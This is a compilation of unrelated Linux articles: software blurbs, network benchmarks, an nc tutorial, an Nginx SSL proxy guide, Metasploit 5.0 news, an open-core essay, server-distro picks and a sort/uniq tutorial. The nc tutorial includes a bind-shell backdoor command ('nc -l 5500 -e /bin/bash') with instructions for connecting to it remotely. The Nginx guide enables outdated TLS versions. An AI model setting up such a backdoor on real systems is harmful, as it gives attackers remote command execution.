Download PDF Split and Merge Linux 4.0.1

Easily split and merge PDF files on Linux

The PDF Split and Merge project is an easy-to-use tool that provides functions to split and merge PDF files or subsections of them.

To install, just unzip the archive into a directory, then double-click the pdfsam-x.x.jar file or open a terminal and type the following command in the folder where you’ve extracted the archive:

java -jar /pathwhereyouunzipped/pdfsam-x.x.jar
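For example, assuming the archive was downloaded to your home directory (the file names here are placeholders; substitute the version you actually downloaded):

unzip ~/pdfsam-x.x.zip -d ~/pdfsam

java -jar ~/pdfsam/pdfsam-x.x.jar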


New in PDF Split and Merge 2.2.2:

  • Added recent environments menu
  • New MSI installer suitable for silent and Active Directory installs (feature request #2977478) (bug #3383859)
  • Console: regexp matching on the bookmarks name when splitting by bookmark level
  • Added argument skipGui that can be passed to skip the GUI restore


Source

10GbE Linux Networking Performance Between CentOS, Fedora, Clear Linux & Debian

For those curious how 10 Gigabit Ethernet performance compares between current Linux distributions, here are some benchmarks as we ramp up more 10GbE Linux/BSD/Windows benchmarking. This round of testing was done on two distinctly different servers while testing CentOS, Debian, Clear Linux, and Fedora.

This is the first of several upcoming 10GbE test comparisons. For this article we are testing some of the popular enterprise Linux distributions, while follow-up articles will also look at some other distros as well as Windows Server and FreeBSD/DragonFlyBSD. CentOS 7, Debian 9.6, Clear Linux rolling, and Fedora Server 29 were the operating systems tested for this initial round.

The first server tested was the Dell PowerEdge R7425 with dual AMD EPYC 7601 processors, 512GB of DDR4 system memory, and Samsung 860 500GB SSD. The PowerEdge R7425 server features dual 10GbE RJ45 Ethernet ports using a Broadcom BCM57417 NetXTreme-E 10GBase-T dual-port controller. For this testing a CAT7 cable was connecting the server to the 10GbE switch.

The second server tested was the Tyan S7106 1U server with two Xeon Gold 6138 processors, 96GB of DDR4 memory, a Samsung 970 EVO SSD, and, for the 10GbE connectivity, a PCIe card with a QLogic cLOM8214 controller connected via a 10G SFP+ DAC cable. This testing isn’t meant for comparing the performance between these distinctly different servers but rather for looking at the 10GbE performance across the multiple Linux distributions.

All four distributions were cleanly installed on each system and tested in their stock configuration with the default kernels and all stable release updates applied.

The system running all of the server processes for the networking benchmarks was an AMD Ryzen Threadripper 2920X system with Gigabyte X399 AORUS Gaming 7 motherboard, 16GB of RAM, 240GB Corsair Force MP510 NVMe SSD, and using a 10GbE PCIe network card with QLogic cLOM8214 controller. That system was running Ubuntu 18.04 LTS.
Source

NC command (NCAT) for beginners

The NC command is for performing maintenance and diagnostic tasks related to the network. It can perform operations like reading, writing, or redirecting data over the network, similar to how you can use the cat command to manipulate files on a Linux system. NC can be used as a utility to scan ports, as a monitoring tool, or as a basic TCP proxy.

Organizations can utilize it to review their network security, web servers, telnet servers, mail servers and so on, by checking which ports are open and then securing them. The NC command can also be used to capture information being sent by a system.
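For example, the OpenBSD variant of nc can scan a range of ports in zero-I/O mode to see which ones are open (the IP and port range here are placeholders):

$ nc -zv 10.10.10.100 20-100

The ‘-z’ option reports connection status without sending any data, while ‘-v’ prints a line for each port tried.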


Now let’s discuss how we can use the NC command, with some examples,


Examples for NC command


Connect to a remote server

The following example shows how we can connect to a remote server with nc,

$ nc 10.10.10.100 80

here, 10.10.10.100 is the IP of the server we want to connect to & 80 is the port number on the remote server. Once connected, we can perform some other functions; for example, we can request the full page content with

GET / HTTP/1.1

or we can grab the banner for OS fingerprinting with the following,

HEAD / HTTP/1.1

This will let us know what software & version is being used to run the web server.
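Putting this together, a full session might look like the following sketch (the address and response lines are illustrative only; note the blank line that terminates the request, and that HTTP/1.1 expects a Host header):

$ nc 10.10.10.100 80
HEAD / HTTP/1.1
Host: 10.10.10.100

HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS)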


Listen to inbound connection requests

To make a server listen for incoming connection requests on a port number, use the following example,

$ nc -l 8080

Now NC is in listening mode, watching port 8080 for incoming connection requests. Listening mode will keep on running until terminated manually, but we can address this with the ‘-w’ (timeout) option for NC,

$ nc -l -w 10 8080

here, 10 means NC will listen for connections for 10 seconds only.
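To try this out, pair the listener with a client from another machine or terminal. On the server, run

$ nc -l 8080

and on the client (10.10.10.100 being a placeholder for the listener’s IP), run

$ echo "hello" | nc 10.10.10.100 8080

The word "hello" will then be printed on the server’s terminal.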


Connecting to UDP ports

By default, we can connect to TCP ports with NC, but to listen for incoming requests made to UDP ports we have to use the ‘-u’ option,

$ nc -l -u 55


Using NC for Port forwarding

With the ‘-c’ option of NC, we can redirect one port to another. A complete example is,

$ nc -u -l 8080 -c 'nc -u -l 8090'

here, we have forwarded all incoming requests from port 8080 to port 8090.


Using NC as Proxy server

To use the NC command as a proxy, use

$ nc -l 8080 | nc 10.10.10.200 80

here, all incoming connections to port 8080 will be diverted to 10.10.10.200 server on port 80.

Now with the above command, we have only created a one-way passage. To create a return passage, i.e. a two-way communication channel, use the following commands,

$ mkfifo 2way

$ nc -l 8080 0<2way | nc 10.10.10.200 80 1>2way

Now you will be able to send and receive data over the nc proxy.


Using NC as chat tool

Another purpose NC can serve is as a chat tool. Yes, we can also use it for chatting. To set this up, first run the following command on one server,

$ nc -l 8080

Then, to connect from the remote machine, run

$ nc 10.10.10.100 8080

Now we can start a conversation using the terminal/CLI.


Using NC to create a system backdoor

Now this one is the most common application of NC & one heavily used by attackers. It creates a backdoor to the system which can then be exploited (you should not be doing this, it’s wrong).
One must be aware of this technique in order to safeguard against this kind of exploit.

The following command can be used to create a backdoor,

$ nc -l 5500 -e /bin/bash

here, we have attached port 5500 to /bin/bash, which a remote machine can now connect to in order to execute commands,

$ nc 10.10.10.100 5500


Force server to remain up

A server will stop listening for connections once a client connection has been terminated. But with the ‘-k’ option, we can force a server to remain running even when no client is connected.

$ nc -l -k 8080
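As a quick check, send data from two clients one after the other (the IP is again a placeholder); without ‘-k’, the second connection would fail because the listener would have exited after the first one,

$ echo "first" | nc 10.10.10.100 8080

$ echo "second" | nc 10.10.10.100 8080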


We now end this tutorial on how to use the NC command; please feel free to send in any questions or queries you have regarding this article.

Source

Simple guide to configure Nginx reverse proxy with SSL

A reverse proxy is a server that takes requests made over the web, i.e. HTTP & HTTPS, and then sends them to a backend server (or servers). A backend server can be a single application server or a group of them, like Tomcat, WildFly or Jenkins, or it can even be another web server like Apache.

We have already discussed how we can configure a simple HTTP reverse proxy with Nginx. In this tutorial, we will discuss how we can configure an Nginx reverse proxy with SSL. So let’s start with the procedure to configure an Nginx reverse proxy with SSL,


Pre-requisites

– A backend server: For the purpose of this tutorial, we are using a Tomcat server running on localhost at port 8080. If you want to learn how to set up an Apache Tomcat server, please read this tutorial.

Note: Make sure that the application server is up when you start proxying the requests.

– SSL cert: We also need an SSL certificate to configure on the server. We can use a Let’s Encrypt certificate, but for this tutorial we will be using a self-signed certificate, which can be created by running the following command from the terminal,

$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/ssl/cert.key -out /etc/nginx/ssl/cert.crt
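Note that the target directory must exist before you run the command above; you can create it and then inspect the generated certificate with the following sketch (assuming the /etc/nginx/ssl path used throughout this tutorial),

$ sudo mkdir -p /etc/nginx/ssl

$ openssl x509 -in /etc/nginx/ssl/cert.crt -noout -subject -dates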


The next step in configuring the Nginx reverse proxy with SSL is Nginx installation.


Install Nginx


Ubuntu

Nginx is available in the default Ubuntu repositories, so simply install it using the following command,

$ sudo apt-get update && sudo apt-get install nginx

CentOS/RHEL

We need to add some extra repositories to install Nginx on CentOS, and we have created a detailed article on Nginx installation for CentOS/RHEL.

Now start the service & enable it at boot,

# systemctl start nginx

# systemctl enable nginx

Now, to check the Nginx installation, we can open a web browser & enter the system IP as the URL; getting the default Nginx web page confirms that Nginx is working fine.
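You can also check from the terminal with curl (replace the IP with your server’s address); an ‘HTTP/1.1 200 OK’ response confirms Nginx is answering,

$ curl -I http://10.10.10.100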


Configuring Nginx reverse proxy with SSL

Now we have everything we need to configure the Nginx reverse proxy with SSL. We will be using the default Nginx configuration file, i.e. ‘/etc/nginx/conf.d/default.conf’.

Assuming this is the first time we are making changes to the configuration, open the file & delete or comment out all of the old content, then make the following entries in the file,

# vi /etc/nginx/conf.d/default.conf

server {
    listen 80;
    return 301 https://$host$request_uri;
}

server {
    listen 443;
    server_name linuxtechlab.com;

    ssl_certificate /etc/nginx/ssl/cert.crt;
    ssl_certificate_key /etc/nginx/ssl/cert.key;
    ssl on;
    ssl_session_cache builtin:1000 shared:SSL:10m;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
    ssl_prefer_server_ciphers on;

    access_log /var/log/nginx/access.log;

    location / {
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_pass http://localhost:8080;
        proxy_read_timeout 90;
        proxy_redirect http://localhost:8080 https://linuxtechlab.com;
    }
}

Once all the changes have been made, save the file & exit. Now, before we restart the Nginx service to apply the changes, let’s discuss the configuration we have made, section by section,

Section 1

server {
    listen 80;
    return 301 https://$host$request_uri;
}

here, we tell Nginx to listen for any request made to port 80 & then redirect it to HTTPS,

Section 2

listen 443;
server_name linuxtechlab.com;

ssl_certificate /etc/nginx/ssl/cert.crt;
ssl_certificate_key /etc/nginx/ssl/cert.key;
ssl on;
ssl_session_cache builtin:1000 shared:SSL:10m;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
ssl_prefer_server_ciphers on;

These are some of the default Nginx SSL options we are using; they point to the certificate files and tell Nginx which protocol versions and SSL ciphers the web server should support,

Section 3

location / {
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_pass http://localhost:8080;
    proxy_read_timeout 90;
    proxy_redirect http://localhost:8080 https://linuxtechlab.com;
}

This section configures the proxy itself: the headers to forward and where incoming requests are sent once they come in. Now that we have discussed all the configuration, we will check it & then restart the Nginx service,

To check the Nginx configuration for syntax errors, run the following command,

# nginx -t

Once the configuration file checks out OK, we will restart the Nginx service,

# systemctl restart nginx

That’s it, our Nginx reverse proxy with SSL is now ready. To test the setup, all you have to do is open a web browser & enter the URL. We should be redirected to the Apache Tomcat web page.
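We can also test from the terminal with curl, assuming the domain from the configuration above. The first request should answer with our 301 redirect, and the second needs ‘-k’ because our certificate is self-signed,

$ curl -I http://linuxtechlab.com

$ curl -k -I https://linuxtechlab.com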

This completes our tutorial on how we can configure an Nginx reverse proxy with SSL; please do send in any questions or queries regarding this tutorial using the comment box below.

Source

Download GStreamer Linux 1.15.1

GStreamer is an open source library, a complex piece of software that acts as a multimedia framework for numerous GNU/Linux operating systems, as well as Android, OpenBSD, Mac OS X, Microsoft Windows, and Symbian OSes.

Features at a glance

Key features include a comprehensive core library, intelligent plugin architecture, extended coverage of multimedia technologies, as well as extensive development tools, so you can easily add support for GStreamer in your applications.

It is the main multimedia backend for a wide range of open source projects, ranging from audio and video playback applications, such as Totem (Videos) from the GNOME desktop environment, to complex video and audio editors.

Additionally, the software features very high performance and low latency, thanks to its extremely lightweight data passing technology, as well as global inter-stream (audio/video) synchronization through clocking.

Comprises multiple codec packs

The project is comprised of several different packages, also known as codec packs, which can be easily installed on any GNU/Linux distribution from its default software repositories, all at once or separately. They are as follows: GStreamer Plugins Base, GStreamer Plugins Good, GStreamer Plugins Bad, and GStreamer Plugins Ugly.

GStreamer provides a compact core library that allows for arbitrary pipeline constructions thanks to its graph-based structure, based on the GLib 2.0 object model library, which can be used for object-oriented design and inheritance.
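To get a feel for this pipeline model, the gst-launch-1.0 tool that ships with GStreamer lets you chain elements on the command line. A minimal sketch (using elements from the Base and Good plugin packages) that plays a test tone through the default audio output:

gst-launch-1.0 audiotestsrc ! audioconvert ! autoaudiosink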

Uses the QoS (Quality of Service) technology

In order to guarantee the best possible audio and video quality under high CPU load, the project uses QoS (Quality of Service) technology. In addition, it provides transparent and trivial construction of multi-threaded pipelines.

Thanks to its simple, stable and clean API (Application Programming Interface), developers can easily integrate it into their applications, as well as to create plugins that will extend its default functionality. It also provides them with a full featured debugging system.

Bottom line

In conclusion, GStreamer is a very powerful and highly appreciated multimedia framework for the open source ecosystem, providing GNU/Linux users with a wide range of audio and video codecs for media playback and processing.

Source

PostmarketOS brings old Androids back to life with Linux

This week the creators of postmarketOS came out of the shadows to show what they’ve been making for the past year. The software system they’ve created takes old Android devices – and some new – and boots an alternate operating system. This is a Linux distro that boots working software to Android devices that would otherwise be long outside their final official software update.

Before you get too excited about bringing your old smartphone back to life like Frankenstein’s Monster, know that this isn’t for everyone. In fact postmarketOS isn’t built to be used by MOST people. Instead it’s made for hackers, developers, and for those that wish to spend inordinate amounts of time fussing with software code to get their long-since-useful smartphone to a state in which it can do a thing or two.

At some point in the distant future, the creators of postmarketOS hope to develop “a sustainable, privacy and security focused free software mobile OS that is modeled after traditional Linux distributions.” To this end, they’ve got “over 100 booting devices” on a list with instructions on how to load it. This does not mean that every version WORKS right this minute.

Instead, the list is full of devices on which just a few tiny parts of the phone work. But for those that are super hardcore about loading new and interesting software to their old devices, this might well be enough. Devices from the very well known to the very, very rare are on this list – Fairphone 1 and 2, the Google Glass Explorer Edition, and the original HTC Desire are all here.

Speaking today on Reddit about the future of the project, user “ollieparanoid” suggested that “in the current state, this is aimed at developers, who are both sick of the current state of mobile phone operating systems, and who enjoy contributing to free software projects in their free time and thereby slowly improving the situation.” He added, “If the project should get abandoned at some point, then we still had contributed to other projects by everything we have upstreamed, and you might even benefit from these changes in the future even if you don’t realize it.”

Let us know if you jump in on the party. If you’ve got a device that’s not on the list, let the creators of the software know!

Source

Metasploit, popular hacking and security tool, gets long-awaited update

The open-source Metasploit Framework 5.0 has long been used by hackers and security professionals alike to break into systems. Now, this popular system penetration testing platform, which enables you to find, exploit, and validate security holes, has been given a long-delayed refresh.

Rapid7, Metasploit’s parent company, announced this first major release since 2011. It brings many new features and a fresh release cadence to the program. While the Framework has remained the same for years, the program was kept up to date and useful with weekly module updates.


These modules contain the latest exploit code for applications, operating systems, and platforms. With these, you can both test your own network and hardware’s security… or attack others. Hackers and security pros alike can also leverage Metasploit Framework’s power to create additional custom security tools or write their own exploit code for new security holes.

With this release, Metasploit has new database and automation application programming interfaces (APIs), evasion modules, and libraries. It also includes expanded language support, improved performance, and better ease of use. This, Rapid7 claims, lays “the groundwork for better teamwork capabilities, tool integration, and exploitation at scale.” That said, if you want an easy-to-use web interface, you need to look to the commercial Metasploit Pro.

Specifically, while Metasploit still uses a PostgreSQL database backend, you can now run the database as a RESTful service. That enables you to run multiple Metasploit consoles and penetration tools simultaneously.

Metasploit has also opened its APIs to more users. In the past, Metasploit had its own unique APIs and network protocol, and it still does. But to make the platform more approachable, it now also offers a much more accessible JSON-RPC API.

The Framework also now supports three different module languages: Go, Python, and Ruby. You can use all these to create new evasion modules. Evasion modules can be used to evade antivirus programs.

Modules can also now be run against multiple targets. Before this, you couldn’t execute an exploit module against more than one host at a time. Now you can attempt mass attacks without writing a script or manual interaction: you target multiple hosts by setting RHOSTS to a range of IPs or by referencing a hosts file with the file:// option.
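In msfconsole, that workflow looks something like the following sketch (the module and address range are illustrative):

msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.1-10.10.10.50
msf5 auxiliary(scanner/portscan/tcp) > run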


The new Metasploit also improved its module search mechanism. The net result is that searching for modules is much faster. Modules have also been given new metadata. So, for example, if you want to know whether a module leaves artifacts on disk, you can search for that.

In addition, Metasploit’s new metashell feature enables users to run sessions in the background, upload/download files, or run resource scripts. You could do this before, but you needed to upgrade to a Meterpreter session first. Meterpreter combines shell functionality and a Ruby client API. It’s overkill for many users, now that metashell supports the more basic functions.

Looking ahead, Metasploit development now has two branches. There’s the 4.x stable branch that underpins Metasploit Pro and open-source projects, such as Kali Linux, ParrotSec Linux, and Metasploit Framework itself, and an unstable branch where core development is done.

Previously, a feature might sit in a pull request for months and still cause bugs when it was released in Kali Linux or Metasploit. Now, with an unstable branch, developers can iterate on features more quickly and thoroughly. The net result is Metasploit will be updated far more quickly going forward.

So, if you want to make sure your systems are locked down tight and as secure as possible, use Metasploit. After all, I can assure you, hackers will be using Metasploit to crack into your company for entirely different reasons.


Source

Some Thoughts on Open Core

Why open core software is bad for the FOSS movement.

Nothing is inherently anti-business about Free and Open Source
Software (FOSS). In fact, a number of different business
models are built on top of FOSS. The best models are those
that continue to further FOSS by internal code contributions and
that advance the principles of Free Software in general. For instance,
there’s the support model, where a company develops free software
but sells expert support for it.

Here, I’d like to talk a bit about one
of the more problematic models out there, the open core model,
because it’s much more prevalent, and it creates some perverse incentives
that run counter
to Free Software principles.

If you haven’t heard about it, the open core business model is one
where a company develops free software (often a network service
intended to be run on a server) and builds a base set of users and
contributors of that free code base. Once there is a critical mass
of features, the company then starts developing an “enterprise”
version of the product that contains additional features aimed at
corporate use. These enterprise features might include things like
extra scalability, login features like LDAP/Active Directory support
or Single Sign-On (SSO) or third-party integrations, or it might just
be an overall improved version of the product with more code
optimizations and speed.

Because such a company wants to charge customers
to use the enterprise version, it creates a closed fork of the
free software code base, or it might provide the additional proprietary
features as modules so it has fewer problems with violating its
free software license.

The first problem with the open core model is that on its face it
doesn’t further the principles behind Free Software, because core developer
time gets focused instead on writing and promoting proprietary
software. Instead of promoting the importance of the freedoms that
Free Software gives both users and developers, these companies often
just use FOSS as a kind of freeware to get an initial base of users
and as free crowdsourcing for software developers that develop the
base product when the company is small and cash-strapped. As the company
gets more funding, it’s then able to hire the most active community
developers, so they then can stop working on the community edition and
instead work full-time on the company’s proprietary software.

This brings me to the second problem. The very nature of open core
creates a perverse situation where a company is incentivized to
put developer effort into improving the proprietary product (that
brings in money) and is de-incentivized to move any of those
improvements into the Free Software community edition. After all,
if the community edition gets more features, why would someone pay
for the enterprise edition? As a result, the community edition is
often many steps behind the enterprise edition, if it gets many
updates at all.

All of those productive core developers are instead
working on improving the closed code. The remaining community ends
up making improvements, often as (strangely enough) third-party modules,
because it can be hard to get the company behind an open core project
to accept modules that compete with its enterprise features.

What’s worse is that a lot of the so-called “enterprise” features
end up being focused on speed optimizations or basic security
features like TLS support—simple improvements you’d want in the
free software version. These speed or security improvements never
make their way into the community edition, because the company intends that only individuals will use that version.

The message from the company
is clear: although the company may support free software on its face
(at the beginning), it believes that free software is for hobbyists
and proprietary software is for professionals.

The final problem with the open core model is that after these
startups move to the enterprise phase and start making money, there
is zero incentive to start any new free software projects within
the company. After all, if a core developer comes up with a great
idea for an improvement or a new side project, that could be something
the company could sell, so it winds up under the proprietary software
“enterprise” umbrella.

Ultimately, the open core model is a version of Embrace, Extend
and Extinguish made famous by Microsoft, only designed for VC-backed
startups. The model allows startups to embrace FOSS when they are
cash- and developer-strapped to get some free development and users
for their software. The moment they have a base product that can
justify the next round of VC funding, they move from embracing to
extending the free “core” to add proprietary enterprise software.
Finally, the free software core gets slowly extinguished. Improvements
and new features in the core product slow to a trickle, as the
proprietary enterprise product gets the majority of developer time
and the differences between the two versions become too difficult
to reconcile. The free software version becomes a kind of freeware
demo for enterprise users to try out before they get the “real”
version. Finally, the community edition lags too far behind and is
abandoned by the company as it tries to hit the profitability phase
of its business and no longer can justify developer effort on
free software. Proprietary software wins, Free Software loses.

Source

Top 5 Linux Server Distributions | Linux.com

Ah, the age-old question: Which Linux distribution is best suited for servers? Typically, when this question is asked, the standard responses pop up:

  • RHEL
  • SUSE
  • Ubuntu Server
  • Debian
  • CentOS

However, in the name of opening your eyes to maybe something a bit different, I’m going to approach this a bit differently. I want to consider a list of possible distributions that are not only outstanding candidates but also easy to use, and that can serve many functions within your business. In some cases, my choices are drop-in replacements for other operating systems, whereas others require a bit of work to get them up to speed.

Some of my choices are community editions of enterprise-grade servers, which could be considered gateways to purchasing a much more powerful platform. You’ll even find one or two entries here to be duty-specific platforms. Most importantly, however, what you’ll find on this list isn’t the usual fare.

ClearOS

What is ClearOS? For home and small business usage, you might not find a better solution. Out of the box, ClearOS includes tools like intrusion detection, a strong firewall, bandwidth management tools, a mail server, a domain controller, and much more. What makes ClearOS stand out above some of the competition is that its purpose is to serve as a simple home and SOHO server with a user-friendly, graphical web-based interface. From that interface, you’ll find an application marketplace (Figure 1), with hundreds of apps (some of which are free, whereas some have an associated cost), that makes it incredibly easy to extend the ClearOS feature set. In other words, you make ClearOS the platform your home and small business needs it to be. Best of all, unlike many other alternatives, you only pay for the software and support you need.

There are three different editions of ClearOS: Community, Home, and Business.

To make the installation of software even easier, the ClearOS marketplace allows you to select via:

  • By Function (which displays apps according to task)
  • By Category (which displays groups of related apps)
  • Quick Select File (which allows you to select pre-configured templates to get you up and running fast)

In other words, if you’re looking for a Linux Home, SOHO, or SMB server, ClearOS is an outstanding choice (especially if you don’t have the Linux chops to get a standard server up and running).

Fedora Server

You’ve heard of Fedora Linux. Of course you have. It’s one of the finest bleeding-edge distributions on the market. But did you know the developers of that excellent Fedora desktop distribution also have a Server edition? The Fedora Server platform is a short-lifecycle, community-supported server OS. This take on the server operating system enables seasoned system administrators, experienced with any flavor of Linux (or any OS at all), to make use of the very latest technologies available in the open source community. There are three key words in that description:

  • Seasoned
  • System
  • Administrators

In other words, new users need not apply. Although Fedora Server is quite capable of handling any task you throw at it, it’s going to require someone with a bit more Linux kung fu to make it work and work well. One very nice inclusion with Fedora Server is that, out of the box, it includes one of the finest open source, web-based interfaces for servers on the market. With Cockpit (Figure 2) you get a quick glance at system resources, logs, storage, and network, as well as the ability to manage accounts, services, applications, and updates.

If you’re okay working with bleeding edge software, and want an outstanding admin dashboard, Fedora Server might be the platform for you.

NethServer

NethServer is about as no-brainer of a drop-in SMB Linux server as you’ll find. With the latest iteration of NethServer, your small business will enjoy:

  • Built-in Samba Active Directory Controller
  • Seamless Nextcloud integration
  • Certificate management
  • Transparent HTTPS proxy
  • Firewall
  • Mail server and filter
  • Web server and filter
  • Groupware
  • IPS/IDS or VPN

All of the included features can be easily configured with a user-friendly, web-based interface that includes single-click installation of modules to expand the NethServer feature set (Figure 3). What sets NethServer apart from ClearOS is that it was designed to make the admin’s job easier. In other words, this platform offers much more in the way of flexibility and power. Unlike ClearOS, which is geared more toward home office and SOHO deployments, NethServer is equally at home in small business environments.

Rockstor

Rockstor is a Linux and Btrfs powered advanced Network Attached Storage (NAS) and cloud storage server that can be deployed for home, SOHO, and small- and mid-sized businesses alike. With Rockstor, you get a full-blown NAS/cloud solution with a user-friendly, web-based GUI tool that is just as easy for admins to set up as it is for users to use. Once you have Rockstor deployed, you can create pools, shares, and snapshots, manage replication and users, share files (with the help of Samba, NFS, SFTP, and AFP), and even extend the feature set, thanks to add-ons (called Rock-ons). The list of Rock-ons includes:

  • CouchPotato (Downloader for usenet and bittorrent users)
  • Deluge (Movie downloader for bittorrent users)
  • EmbyServer (Emby media server)
  • Ghost (Publishing platform for professional bloggers)
  • GitLab CE (Git repository hosting and collaboration)
  • Gogs Go Git Service (Lightweight Git version control server and front end)
  • Headphones (An automated music downloader for NZB and Torrent)
  • Logitech Squeezebox Server for Squeezebox Devices
  • MariaDB (Relational database management system)
  • NZBGet (Efficient usenet downloader)
  • OwnCloud-Official (Secure file sharing and hosting)
  • Plexpy (Python-based Plex Usage tracker)
  • Rocket.Chat (Open Source Chat Platform)
  • SaBnzbd (Usenet downloader)
  • Sickbeard (Internet PVR for TV shows)
  • Sickrage (Automatic Video Library Manager for TV Shows)
  • Sonarr (PVR for usenet and bittorrent users)
  • Symform (Backup service)

Rockstor also includes an at-a-glance dashboard that gives admins quick access to all the information they need about their server (Figure 4).

Zentyal

Zentyal is another Small Business Server that does a great job of handling multiple tasks. If you’re looking for a Linux distribution that can handle the likes of:

  • Directory and Domain server
  • Mail server
  • Gateway
  • DHCP, DNS, and NTP server
  • Certification Authority
  • VPN
  • Instant Messaging
  • FTP server
  • Antivirus
  • SSO authentication
  • File sharing
  • RADIUS
  • Virtualization Management
  • And more

Zentyal might be your new go-to. Zentyal has been around since 2004 and is based on Ubuntu Server, so it enjoys a rock-solid base and plenty of applications. And with the help of the Zentyal dashboard (Figure 5), admins can easily manage:

  • System
  • Network
  • Logs
  • Software updates and installation
  • Users/groups
  • Domains
  • File sharing
  • Mail
  • DNS
  • Firewall
  • Certificates
  • And much more

Adding new components to the Zentyal server is as simple as opening the Dashboard, clicking on Software Management > Zentyal Components, selecting what you want to add, and clicking Install. The one issue you might find with Zentyal is that it doesn’t offer nearly the number of add-ons you’ll find in the likes of NethServer and ClearOS. But the services it does offer, Zentyal does incredibly well.

Plenty More Where These Came From

This list of Linux servers is clearly not exhaustive. What it is, however, is a unique look at the top five server distributions you’ve probably not heard of. Of course, if you’d rather opt for a more traditional Linux server distribution, you can always stick with CentOS, Ubuntu Server, SUSE, Red Hat Enterprise Linux, or Debian… most of which are found on every list of best server distributions on the market. If, however, you’re looking for something a bit different, give one of these five distros a try.

Learn more about Linux through the free “Introduction to Linux” course from The Linux Foundation and edX.

Source

Back to Basics: Sort and Uniq | Linux.com

Learn the fundamentals of sorting and de-duplicating text on the command line.

If you’ve been using the command line for a long time, it’s easy to take the commands you use every day for granted. But, if you’re new to the Linux command line, there are several commands that make your life easier that you may not stumble upon automatically. In this article, I cover the basics of two commands that are essential in anyone’s arsenal: sort and uniq.

The sort command does exactly what it says: it takes text data as input and outputs sorted data. There are many scenarios on the command line when you may need to sort output, such as the output from a command that doesn’t offer sorting options of its own (or the sort arguments are obscure enough that you just use the sort command instead). In other cases, you may have a text file full of data (perhaps generated with some other script), and you need a quick way to view it in a sorted form.

Let’s start with a file named “test” that contains three lines:


Foo
Bar
Baz

sort can operate on STDIN redirection or on input from a pipe, or, in the case of a file, you can just specify the file on the command line. So, the three following commands all accomplish the same thing:


cat test | sort
sort < test
sort test

And the output that you get from all of these commands is:


Bar
Baz
Foo

Sorting Numerical Output

Now, let’s complicate the file by adding three more lines:


Foo
Bar
Baz
1. ZZZ
2. YYY
11. XXX

If you run one of the above sort commands again, this time, you’ll see different output:


11. XXX
1. ZZZ
2. YYY
Bar
Baz
Foo

This is likely not the output you wanted, but it points out an important fact about sort. By default, it sorts alphabetically, not numerically. This means that a line that starts with “11.” is sorted above a line that starts with “1.”, and all of the lines that start with numbers are sorted above lines that start with letters.

To sort numerically, pass sort the -n option:


sort -n test

Bar
Baz
Foo
1. ZZZ
2. YYY
11. XXX

Find the Largest Directories on a Filesystem

Numerical sorting comes in handy for a lot of command-line output—in particular, when your command contains a tally of some kind, and you want to see the largest or smallest in the tally. For instance, if you want to find out what files are using the most space in a particular directory and you want to dig down recursively, you would run a command like this:


du -ckx

This command dives recursively into the current directory and doesn’t traverse any other mountpoints inside that directory. It tallies the file sizes and then outputs each directory in the order it found them, preceded by the size of the files underneath it in kilobytes. Of course, if you’re running such a command, it’s probably because you want to know which directory is using the most space, and this is where sort comes in:


du -ckx | sort -n

Now you’ll get a list of all of the directories underneath the current directory, but this time sorted by file size. If you want to get even fancier, pipe its output to the tail command to see the top ten. On the other hand, if you wanted the largest directories to be at the top of the output, not the bottom, you would add the -r option, which tells sort to reverse the order. So to get the top ten (well, top eight: the first line is the total, and the next line is the size of the current directory):


du -ckx | sort -rn | head

This works, but often people using the du command want to see sizes in more readable output than kilobytes. The du command offers the -h argument that provides “human-readable” output. So, you’ll see output like 9.6G instead of 10024764 with the -k option. When you pipe that human-readable output to sort though, you won’t get the results you expect by default, as it will sort 9.6G above 9.6K, which would be above 9.6M.

The sort command has a -h option of its own, and it acts like -n, but it’s able to parse standard human-readable numbers and sort them accordingly. So, to see the top ten largest directories in your current directory with human-readable output, you would type this:


du -chx | sort -rh | head

Removing Duplicates

The sort command isn’t limited to sorting one file. You might pipe multiple files into it or list multiple files as arguments on the command line, and it will combine them all and sort them. Unfortunately though, if those files contain some of the same information, you will end up with duplicates in the sorted output.

To remove duplicates, you need the uniq command, which by default removes any duplicate lines that are adjacent to each other from its input and outputs the results. So, let’s say you had two files that were different lists of names:


cat namelist1.txt
Jones, Bob
Smith, Mary
Babbage, Walter

cat namelist2.txt
Jones, Bob
Jones, Shawn
Smith, Cathy

You could remove the duplicates by piping to uniq:


sort namelist1.txt namelist2.txt | uniq
Babbage, Walter
Jones, Bob
Jones, Shawn
Smith, Cathy
Smith, Mary

The uniq command has more tricks up its sleeve than this. It also can output only the duplicated lines, so you can find duplicates in a set of files quickly by adding the -d option:


sort namelist1.txt namelist2.txt | uniq -d
Jones, Bob

You even can have uniq provide a tally of how many times it has found each entry with the -c option:


sort namelist1.txt namelist2.txt | uniq -c
1 Babbage, Walter
2 Jones, Bob
1 Jones, Shawn
1 Smith, Cathy
1 Smith, Mary

As you can see, “Jones, Bob” occurred the most times, but if you had a lot of lines, this sort of tally might be less useful for you, as you’d like the most duplicates to bubble up to the top. Fortunately, you have the sort command:


sort namelist1.txt namelist2.txt | uniq -c | sort -nr
2 Jones, Bob
1 Smith, Mary
1 Smith, Cathy
1 Jones, Shawn
1 Babbage, Walter

Conclusion

I hope these cases of using sort and uniq with realistic examples show you how powerful these simple command-line tools are. Half the secret with these foundational command-line tools is to discover (and remember) they exist so that they’ll be at your command the next time you run into a problem they can solve.

Source
